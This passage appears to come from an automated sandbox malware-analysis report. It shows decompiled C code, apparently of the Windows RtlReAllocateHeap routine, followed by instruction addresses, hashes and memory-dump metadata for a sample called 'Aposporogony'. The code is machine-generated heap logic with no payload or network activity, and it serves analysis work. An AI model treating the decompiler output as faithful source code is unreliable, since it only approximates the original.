                                                                                                                                                                                      					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
                                                                                                                                                                                      					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
                                                                                                                                                                                      						goto L68;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_t284 - 0x20) = 0;
                                                                                                                                                                                      					__eflags = _t236 & 0x00000001;
                                                                                                                                                                                      					if((_t236 & 0x00000001) == 0) {
                                                                                                                                                                                      						E1D84FED0( *((intOrPtr*)(_t281 + 0xc8)));
                                                                                                                                                                                      						 *((char*)(_t284 - 0x19)) = 1;
                                                                                                                                                                                      						_t226 =  *(_t284 - 0x30) | 0x10000101;
                                                                                                                                                                                      						__eflags = _t226;
                                                                                                                                                                                      						 *(_t284 - 0x34) = _t226;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L1D8F0835(_t281, 0);
                                                                                                                                                                                      					_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                                      					_t269 = _t277 - 8;
                                                                                                                                                                                      					__eflags =  *((char*)(_t269 + 7)) - 5;
                                                                                                                                                                                      					if( *((char*)(_t269 + 7)) == 5) {
                                                                                                                                                                                      						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
                                                                                                                                                                                      						__eflags = _t269;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *(_t284 - 0x2c) = _t269;
                                                                                                                                                                                      					 *(_t284 - 0x28) = _t269;
                                                                                                                                                                                      					_t240 = _t281;
                                                                                                                                                                                      					_t149 = E1D83753F(_t240, _t269, "RtlReAllocateHeap");
                                                                                                                                                                                      					__eflags = _t149;
                                                                                                                                                                                      					if(_t149 == 0) {
                                                                                                                                                                                      						L53:
                                                                                                                                                                                      						_t150 =  *(_t284 - 0x24);
                                                                                                                                                                                      						__eflags = _t150;
                                                                                                                                                                                      						if(_t150 == 0) {
                                                                                                                                                                                      							goto L73;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t150 -  *0x1d9347c8; // 0x0
                                                                                                                                                                                      						_t151 =  *[fs:0x30];
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							_t152 =  *(_t151 + 0x68);
                                                                                                                                                                                      							 *(_t284 - 0x48) = _t152;
                                                                                                                                                                                      							__eflags = _t152 & 0x00000800;
                                                                                                                                                                                      							if((_t152 & 0x00000800) == 0) {
                                                                                                                                                                                      								goto L73;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(_t284 - 0x20) -  *0x1d9347cc; // 0x0
                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                      								goto L73;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d9347ce; // 0x0
                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                      								goto L73;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t155 =  *[fs:0x30];
                                                                                                                                                                                      							__eflags =  *(_t155 + 0xc);
                                                                                                                                                                                      							if( *(_t155 + 0xc) == 0) {
                                                                                                                                                                                      								_push("HEAP: ");
                                                                                                                                                                                      								E1D83B910();
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(E1D8E823A(_t281,  *(_t284 - 0x20)));
                                                                                                                                                                                      							_push( *(_t284 + 0xc));
                                                                                                                                                                                      							E1D83B910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
                                                                                                                                                                                      							L59:
                                                                                                                                                                                      							_t159 =  *[fs:0x30];
                                                                                                                                                                                      							__eflags =  *((char*)(_t159 + 2));
                                                                                                                                                                                      							if( *((char*)(_t159 + 2)) != 0) {
                                                                                                                                                                                      								 *0x1d9347a1 = 1;
                                                                                                                                                                                      								 *0x1d934100 = 0;
                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                      								 *0x1d9347a1 = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L73;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags =  *(_t151 + 0xc);
                                                                                                                                                                                      						if( *(_t151 + 0xc) == 0) {
                                                                                                                                                                                      							_push("HEAP: ");
                                                                                                                                                                                      							E1D83B910();
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push( *(_t284 + 0xc));
                                                                                                                                                                                      						E1D83B910("Just reallocated block at %p to %Ix bytes\n",  *0x1d9347c8);
                                                                                                                                                                                      						goto L59;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eflags = _t277 -  *0x1d9347c8; // 0x0
                                                                                                                                                                                      						_t172 =  *[fs:0x30];
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							_t173 =  *(_t172 + 0x68);
                                                                                                                                                                                      							 *(_t284 - 0x44) = _t173;
                                                                                                                                                                                      							__eflags = _t173 & 0x00000800;
                                                                                                                                                                                      							if((_t173 & 0x00000800) == 0) {
                                                                                                                                                                                      								L38:
                                                                                                                                                                                      								_t174 = E1D852710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
                                                                                                                                                                                      								 *(_t284 - 0x24) = _t174;
                                                                                                                                                                                      								__eflags = _t174;
                                                                                                                                                                                      								if(_t174 != 0) {
                                                                                                                                                                                      									_t75 = _t174 - 8; // -8
                                                                                                                                                                                      									_t278 = _t75;
                                                                                                                                                                                      									__eflags =  *((char*)(_t278 + 7)) - 5;
                                                                                                                                                                                      									if( *((char*)(_t278 + 7)) == 5) {
                                                                                                                                                                                      										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
                                                                                                                                                                                      										__eflags = _t278;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t248 = _t278;
                                                                                                                                                                                      									 *(_t284 - 0x28) = _t278;
                                                                                                                                                                                      									__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                                      									if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                                      										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                                                                                                                                      										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											_push(_t248);
                                                                                                                                                                                      											_t269 = _t278;
                                                                                                                                                                                      											E1D8FD646(0, _t281, _t278, _t278, _t281, __eflags);
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t278 + 2) & 0x00000002;
                                                                                                                                                                                      									if(( *(_t278 + 2) & 0x00000002) == 0) {
                                                                                                                                                                                      										_t177 =  *(_t278 + 3);
                                                                                                                                                                                      										 *(_t284 - 0x1b) = _t177;
                                                                                                                                                                                      										_t178 = _t177 & 0x000000ff;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t183 = E1D873AE9(_t278);
                                                                                                                                                                                      										 *(_t284 - 0x30) = _t183;
                                                                                                                                                                                      										__eflags =  *(_t281 + 0x40) & 0x08000000;
                                                                                                                                                                                      										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
                                                                                                                                                                                      											 *_t183 = 0;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t184 = E1D86FDB9(1, _t269);
                                                                                                                                                                                      											_t253 =  *(_t284 - 0x30);
                                                                                                                                                                                      											 *_t253 = _t184;
                                                                                                                                                                                      											_t183 = _t253;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t178 =  *((intOrPtr*)(_t183 + 2));
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *(_t284 - 0x20) = _t178;
                                                                                                                                                                                      									__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                                      									if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                                      										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
                                                                                                                                                                                      										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
                                                                                                                                                                                      										__eflags =  *_t278;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E1D8F0D24(_t281);
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								L1D8F0835(_t281, 0);
                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *0x1d9347cc;
                                                                                                                                                                                      							if( *0x1d9347cc == 0) {
                                                                                                                                                                                      								goto L38;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t279 =  *(_t284 - 0x28);
                                                                                                                                                                                      							_t269 =  *(_t284 - 0x2c);
                                                                                                                                                                                      							__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                                      							if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                                      								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                                                                                                                                      								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									_push(_t240);
                                                                                                                                                                                      									E1D8FD646(0, _t281, _t279, _t279, _t281, __eflags);
                                                                                                                                                                                      									_t269 =  *(_t284 - 0x2c);
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t279[0] & 0x00000002;
                                                                                                                                                                                      							if((_t279[0] & 0x00000002) == 0) {
                                                                                                                                                                                      								_t192 = _t279[0];
                                                                                                                                                                                      								 *(_t284 - 0x1a) = _t192;
                                                                                                                                                                                      								_t193 = _t192 & 0x000000ff;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t209 = E1D873AE9(_t279);
                                                                                                                                                                                      								 *(_t284 - 0x30) = _t209;
                                                                                                                                                                                      								_t193 =  *(_t209 + 2) & 0x0000ffff;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t255 = _t193;
                                                                                                                                                                                      							 *(_t284 - 0x20) = _t193;
                                                                                                                                                                                      							__eflags =  *(_t281 + 0x4c);
                                                                                                                                                                                      							if( *(_t281 + 0x4c) != 0) {
                                                                                                                                                                                      								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
                                                                                                                                                                                      								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
                                                                                                                                                                                      								__eflags =  *_t279;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t255;
                                                                                                                                                                                      							if(_t255 == 0) {
                                                                                                                                                                                      								L37:
                                                                                                                                                                                      								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags = _t255 -  *0x1d9347cc; // 0x0
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x1d9347ce; // 0x0
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t195 =  *[fs:0x30];
                                                                                                                                                                                      								__eflags =  *(_t195 + 0xc);
                                                                                                                                                                                      								if( *(_t195 + 0xc) == 0) {
                                                                                                                                                                                      									_push("HEAP: ");
                                                                                                                                                                                      									E1D83B910();
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t269 =  *(_t284 - 0x20);
                                                                                                                                                                                      								_push(E1D8E823A(_t281,  *(_t284 - 0x20)));
                                                                                                                                                                                      								_push( *(_t284 + 0xc));
                                                                                                                                                                                      								_t277 =  *((intOrPtr*)(_t284 + 8));
                                                                                                                                                                                      								E1D83B910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
                                                                                                                                                                                      								_t286 = _t286 + 0x10;
                                                                                                                                                                                      								L18:
                                                                                                                                                                                      								_t199 =  *[fs:0x30];
                                                                                                                                                                                      								__eflags =  *((char*)(_t199 + 2));
                                                                                                                                                                                      								if( *((char*)(_t199 + 2)) != 0) {
                                                                                                                                                                                      									 *0x1d9347a1 = 1;
                                                                                                                                                                                      									 *0x1d934100 = 0;
                                                                                                                                                                                      									asm("int3");
                                                                                                                                                                                      									 *0x1d9347a1 = 0;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L38;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags =  *(_t172 + 0xc);
                                                                                                                                                                                      						if( *(_t172 + 0xc) == 0) {
                                                                                                                                                                                      							_push("HEAP: ");
                                                                                                                                                                                      							E1D83B910();
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push( *(_t284 + 0xc));
                                                                                                                                                                                      						E1D83B910("About to reallocate block at %p to %Ix bytes\n",  *0x1d9347c8);
                                                                                                                                                                                      						_t286 = _t286 + 0xc;
                                                                                                                                                                                      						goto L18;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t283 =  *0x1d93374c; // 0x0
                                                                                                                                                                                      					 *0x1d9391e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
                                                                                                                                                                                      					_t132 =  *_t283();
                                                                                                                                                                                      					L75:
                                                                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
                                                                                                                                                                                      					return _t132;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}





































                                                                                                                                                                                      0x1d8efdf4
                                                                                                                                                                                      0x1d8efdf6
                                                                                                                                                                                      0x1d8efdfb
                                                                                                                                                                                      0x1d8efe02
                                                                                                                                                                                      0x1d8efe04
                                                                                                                                                                                      0x1d8efe09
                                                                                                                                                                                      0x1d8efe0c
                                                                                                                                                                                      0x1d8efe16
                                                                                                                                                                                      0x1d8efe35
                                                                                                                                                                                      0x1d8efe38
                                                                                                                                                                                      0x1d8efe46
                                                                                                                                                                                      0x1d8efe4b
                                                                                                                                                                                      0x1d8efe4d
                                                                                                                                                                                      0x1d8f0277
                                                                                                                                                                                      0x1d8f0277
                                                                                                                                                                                      0x1d8f027a
                                                                                                                                                                                      0x1d8f027a
                                                                                                                                                                                      0x1d8f02c2
                                                                                                                                                                                      0x1d8f02c9
                                                                                                                                                                                      0x1d8f02ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f02ce
                                                                                                                                                                                      0x1d8efe56
                                                                                                                                                                                      0x1d8efe58
                                                                                                                                                                                      0x1d8efe62
                                                                                                                                                                                      0x1d8efe65
                                                                                                                                                                                      0x1d8efe69
                                                                                                                                                                                      0x1d8efe72
                                                                                                                                                                                      0x1d8efe72
                                                                                                                                                                                      0x1d8efe6b
                                                                                                                                                                                      0x1d8efe6b
                                                                                                                                                                                      0x1d8efe6b
                                                                                                                                                                                      0x1d8efe81
                                                                                                                                                                                      0x1d8efe84
                                                                                                                                                                                      0x1d8efe87
                                                                                                                                                                                      0x1d8efe8a
                                                                                                                                                                                      0x1d8f0231
                                                                                                                                                                                      0x1d8f0231
                                                                                                                                                                                      0x1d8f0237
                                                                                                                                                                                      0x1d8f023a
                                                                                                                                                                                      0x1d8f0259
                                                                                                                                                                                      0x1d8f025e
                                                                                                                                                                                      0x1d8f023c
                                                                                                                                                                                      0x1d8f0251
                                                                                                                                                                                      0x1d8f0256
                                                                                                                                                                                      0x1d8f0264
                                                                                                                                                                                      0x1d8f026f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f0274
                                                                                                                                                                                      0x1d8efe90
                                                                                                                                                                                      0x1d8efe93
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8efe9b
                                                                                                                                                                                      0x1d8efe9f
                                                                                                                                                                                      0x1d8efea2
                                                                                                                                                                                      0x1d8efeaa
                                                                                                                                                                                      0x1d8efeaf
                                                                                                                                                                                      0x1d8efeb6
                                                                                                                                                                                      0x1d8efeb6
                                                                                                                                                                                      0x1d8efebb
                                                                                                                                                                                      0x1d8efebb
                                                                                                                                                                                      0x1d8efec2
                                                                                                                                                                                      0x1d8efec7
                                                                                                                                                                                      0x1d8efeca
                                                                                                                                                                                      0x1d8efecd
                                                                                                                                                                                      0x1d8efed1
                                                                                                                                                                                      0x1d8efeda
                                                                                                                                                                                      0x1d8efeda
                                                                                                                                                                                      0x1d8efeda
                                                                                                                                                                                      0x1d8efedc
                                                                                                                                                                                      0x1d8efedf
                                                                                                                                                                                      0x1d8efee7
                                                                                                                                                                                      0x1d8efee9
                                                                                                                                                                                      0x1d8efeee
                                                                                                                                                                                      0x1d8efef0
                                                                                                                                                                                      0x1d8f0122
                                                                                                                                                                                      0x1d8f0122
                                                                                                                                                                                      0x1d8f0125
                                                                                                                                                                                      0x1d8f0127
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f012d
                                                                                                                                                                                      0x1d8f0133
                                                                                                                                                                                      0x1d8f0139
                                                                                                                                                                                      0x1d8f01a7
                                                                                                                                                                                      0x1d8f01aa
                                                                                                                                                                                      0x1d8f01ad
                                                                                                                                                                                      0x1d8f01b2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f01bc
                                                                                                                                                                                      0x1d8f01c3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f01cd
                                                                                                                                                                                      0x1d8f01d4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f01da
                                                                                                                                                                                      0x1d8f01e0
                                                                                                                                                                                      0x1d8f01e3
                                                                                                                                                                                      0x1d8f0202
                                                                                                                                                                                      0x1d8f0207
                                                                                                                                                                                      0x1d8f01e5
                                                                                                                                                                                      0x1d8f01fa
                                                                                                                                                                                      0x1d8f01ff
                                                                                                                                                                                      0x1d8f0218
                                                                                                                                                                                      0x1d8f0219
                                                                                                                                                                                      0x1d8f0224
                                                                                                                                                                                      0x1d8f017e
                                                                                                                                                                                      0x1d8f017e
                                                                                                                                                                                      0x1d8f0184
                                                                                                                                                                                      0x1d8f0188
                                                                                                                                                                                      0x1d8f018e
                                                                                                                                                                                      0x1d8f0195
                                                                                                                                                                                      0x1d8f019b
                                                                                                                                                                                      0x1d8f019c
                                                                                                                                                                                      0x1d8f019c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f0188
                                                                                                                                                                                      0x1d8f013b
                                                                                                                                                                                      0x1d8f013e
                                                                                                                                                                                      0x1d8f015d
                                                                                                                                                                                      0x1d8f0162
                                                                                                                                                                                      0x1d8f0140
                                                                                                                                                                                      0x1d8f0155
                                                                                                                                                                                      0x1d8f015a
                                                                                                                                                                                      0x1d8f0168
                                                                                                                                                                                      0x1d8f0176
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8efef6
                                                                                                                                                                                      0x1d8efef6
                                                                                                                                                                                      0x1d8efefc
                                                                                                                                                                                      0x1d8eff02
                                                                                                                                                                                      0x1d8eff70
                                                                                                                                                                                      0x1d8eff73
                                                                                                                                                                                      0x1d8eff76
                                                                                                                                                                                      0x1d8eff7b
                                                                                                                                                                                      0x1d8f0068
                                                                                                                                                                                      0x1d8f0070
                                                                                                                                                                                      0x1d8f0075
                                                                                                                                                                                      0x1d8f0078
                                                                                                                                                                                      0x1d8f007a
                                                                                                                                                                                      0x1d8f0080
                                                                                                                                                                                      0x1d8f0080
                                                                                                                                                                                      0x1d8f0083
                                                                                                                                                                                      0x1d8f0087
                                                                                                                                                                                      0x1d8f0090
                                                                                                                                                                                      0x1d8f0090
                                                                                                                                                                                      0x1d8f0090
                                                                                                                                                                                      0x1d8f0092
                                                                                                                                                                                      0x1d8f0094
                                                                                                                                                                                      0x1d8f0097
                                                                                                                                                                                      0x1d8f009a
                                                                                                                                                                                      0x1d8f009f
                                                                                                                                                                                      0x1d8f00a9
                                                                                                                                                                                      0x1d8f00ac
                                                                                                                                                                                      0x1d8f00ae
                                                                                                                                                                                      0x1d8f00af
                                                                                                                                                                                      0x1d8f00b3
                                                                                                                                                                                      0x1d8f00b3
                                                                                                                                                                                      0x1d8f00ac
                                                                                                                                                                                      0x1d8f00b8
                                                                                                                                                                                      0x1d8f00bc
                                                                                                                                                                                      0x1d8f00ec
                                                                                                                                                                                      0x1d8f00ef
                                                                                                                                                                                      0x1d8f00f2
                                                                                                                                                                                      0x1d8f00be
                                                                                                                                                                                      0x1d8f00c0
                                                                                                                                                                                      0x1d8f00c5
                                                                                                                                                                                      0x1d8f00ca
                                                                                                                                                                                      0x1d8f00d1
                                                                                                                                                                                      0x1d8f00e3
                                                                                                                                                                                      0x1d8f00d3
                                                                                                                                                                                      0x1d8f00d4
                                                                                                                                                                                      0x1d8f00d9
                                                                                                                                                                                      0x1d8f00dc
                                                                                                                                                                                      0x1d8f00df
                                                                                                                                                                                      0x1d8f00df
                                                                                                                                                                                      0x1d8f00e6
                                                                                                                                                                                      0x1d8f00e6
                                                                                                                                                                                      0x1d8f00f5
                                                                                                                                                                                      0x1d8f00f9
                                                                                                                                                                                      0x1d8f00fc
                                                                                                                                                                                      0x1d8f0108
                                                                                                                                                                                      0x1d8f010e
                                                                                                                                                                                      0x1d8f010e
                                                                                                                                                                                      0x1d8f010e
                                                                                                                                                                                      0x1d8f00fc
                                                                                                                                                                                      0x1d8f0114
                                                                                                                                                                                      0x1d8f0119
                                                                                                                                                                                      0x1d8f011d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f011d
                                                                                                                                                                                      0x1d8eff81
                                                                                                                                                                                      0x1d8eff88
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8eff8e
                                                                                                                                                                                      0x1d8eff91
                                                                                                                                                                                      0x1d8eff94
                                                                                                                                                                                      0x1d8eff97
                                                                                                                                                                                      0x1d8eff9c
                                                                                                                                                                                      0x1d8effa6
                                                                                                                                                                                      0x1d8effa9
                                                                                                                                                                                      0x1d8effab
                                                                                                                                                                                      0x1d8effb0
                                                                                                                                                                                      0x1d8effb5
                                                                                                                                                                                      0x1d8effb5
                                                                                                                                                                                      0x1d8effa9
                                                                                                                                                                                      0x1d8effb8
                                                                                                                                                                                      0x1d8effbc
                                                                                                                                                                                      0x1d8effce
                                                                                                                                                                                      0x1d8effd1
                                                                                                                                                                                      0x1d8effd4
                                                                                                                                                                                      0x1d8effbe
                                                                                                                                                                                      0x1d8effc0
                                                                                                                                                                                      0x1d8effc5
                                                                                                                                                                                      0x1d8effc8
                                                                                                                                                                                      0x1d8effc8
                                                                                                                                                                                      0x1d8effd7
                                                                                                                                                                                      0x1d8effd9
                                                                                                                                                                                      0x1d8effdd
                                                                                                                                                                                      0x1d8effe0
                                                                                                                                                                                      0x1d8effea
                                                                                                                                                                                      0x1d8efff0
                                                                                                                                                                                      0x1d8efff0
                                                                                                                                                                                      0x1d8efff0
                                                                                                                                                                                      0x1d8efff2
                                                                                                                                                                                      0x1d8efff5
                                                                                                                                                                                      0x1d8f0065
                                                                                                                                                                                      0x1d8f0065
                                                                                                                                                                                      0x1d8efff7
                                                                                                                                                                                      0x1d8efff7
                                                                                                                                                                                      0x1d8efffe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f0004
                                                                                                                                                                                      0x1d8f000b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8f000d
                                                                                                                                                                                      0x1d8f0013
                                                                                                                                                                                      0x1d8f0016
                                                                                                                                                                                      0x1d8f0035
                                                                                                                                                                                      0x1d8f003a
                                                                                                                                                                                      0x1d8f0018
                                                                                                                                                                                      0x1d8f002d
                                                                                                                                                                                      0x1d8f0032
                                                                                                                                                                                      0x1d8f0040
                                                                                                                                                                                      0x1d8f004b
                                                                                                                                                                                      0x1d8f004c
                                                                                                                                                                                      0x1d8f004f
                                                                                                                                                                                      0x1d8f0058
                                                                                                                                                                                      0x1d8f005d
                                                                                                                                                                                      0x1d8eff47
                                                                                                                                                                                      0x1d8eff47
                                                                                                                                                                                      0x1d8eff4d
                                                                                                                                                                                      0x1d8eff51
                                                                                                                                                                                      0x1d8eff57
                                                                                                                                                                                      0x1d8eff5e
                                                                                                                                                                                      0x1d8eff64
                                                                                                                                                                                      0x1d8eff65
                                                                                                                                                                                      0x1d8eff65
                                                                                                                                                                                      0x1d8eff51
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8efff5
                                                                                                                                                                                      0x1d8eff04
                                                                                                                                                                                      0x1d8eff07
                                                                                                                                                                                      0x1d8eff26
                                                                                                                                                                                      0x1d8eff2b
                                                                                                                                                                                      0x1d8eff09
                                                                                                                                                                                      0x1d8eff1e
                                                                                                                                                                                      0x1d8eff23
                                                                                                                                                                                      0x1d8eff31
                                                                                                                                                                                      0x1d8eff3f
                                                                                                                                                                                      0x1d8eff44
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8eff44
                                                                                                                                                                                      0x1d8efe18
                                                                                                                                                                                      0x1d8efe20
                                                                                                                                                                                      0x1d8efe28
                                                                                                                                                                                      0x1d8efe2e
                                                                                                                                                                                      0x1d8f02d1
                                                                                                                                                                                      0x1d8f02d4
                                                                                                                                                                                      0x1d8f02e0
                                                                                                                                                                                      0x1d8f02e0

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                                                      • Opcode ID: 29b96f950bad6ffe1eda0f4411730910ffa0a58d9e6d4a950812b40b25996913
                                                                                                                                                                                      • Instruction ID: 28fc581d134ac69fb98a97ba8c16915ebe453b3a57c223d1bb4b1cfc3bdc3475
                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b96f950bad6ffe1eda0f4411730910ffa0a58d9e6d4a950812b40b25996913
                                                                                                                                                                                      • Instruction Fuzzy Hash: F1D1D039904695EFCB02CFA8C440BADBBF1FF4A711F068459E4499B362D735E942CB52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E1D874C3D(void* __ecx) {
                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                      				intOrPtr* _t24;
                                                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                      				intOrPtr _t40;
                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                      				intOrPtr* _t48;
                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                      				intOrPtr _t51;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                      				_t42 = __ecx;
                                                                                                                                                                                      				_t51 =  *0x1d9365e4; // 0x7726f0e0
                                                                                                                                                                                      				if(_t51 == 0) {
                                                                                                                                                                                      					L10:
                                                                                                                                                                                      					return _t45;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t40 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                                                                                      				_t36 =  *0x1d935b24; // 0x19a2cf0
                                                                                                                                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
                                                                                                                                                                                      					_t24 =  *((intOrPtr*)(_t42 + 0x28));
                                                                                                                                                                                      					if(_t42 == _t36) {
                                                                                                                                                                                      						_t47 = 0x5c;
                                                                                                                                                                                      						if( *_t24 == _t47) {
                                                                                                                                                                                      							_t39 = 0x3f;
